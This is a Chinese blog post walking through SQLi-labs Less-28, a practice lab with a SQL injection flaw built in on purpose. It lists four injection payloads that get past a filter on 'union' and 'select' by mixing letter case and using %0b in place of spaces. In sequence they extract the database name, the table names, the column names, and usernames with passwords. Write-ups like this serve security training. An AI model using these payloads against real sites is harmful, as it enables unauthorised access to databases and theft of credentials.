码迷,mamicode.com
首页 > 其他好文 > 详细

Less(28)GET - Error Based- All your UNION & SELECT belong to us String-Single quote without parenthesis基于错误的,单引号字符型,过滤了union和select等的注入

时间:2020-03-03 17:32:44      阅读:67      评论:0      收藏:0      [点我收藏+]

标签:union   where   word   ima   ati   union和   nbsp   就是   ble   

1.这个和Less(27)差不多,就是把参数变成 id=(‘1‘)

2.爆破

  (1)爆库:?id=0‘)%0buniOn%0bsElEct%0b1,database(),3%0bor%0b(‘1‘)=(‘1 

    技术图片

  (2)爆表:?id=0‘)%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=‘security‘%0b%26%26%0b(‘1‘)=(‘1

    技术图片

  (3)表列名:?id=0‘)%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema=‘security‘%0bAnd%0btable_name=‘users‘%0b%26%26%0b(‘1‘)=(‘1

    技术图片

  (4)爆值:?id=0‘)%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),(‘(3

    技术图片

 

Less(28)GET - Error Based- All your UNION & SELECT belong to us String-Single quote without parenthesis基于错误的,单引号字符型,过滤了union和select等的注入

标签:union   where   word   ima   ati   union和   nbsp   就是   ble   

原文地址:https://www.cnblogs.com/meng-yu37/p/12403411.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!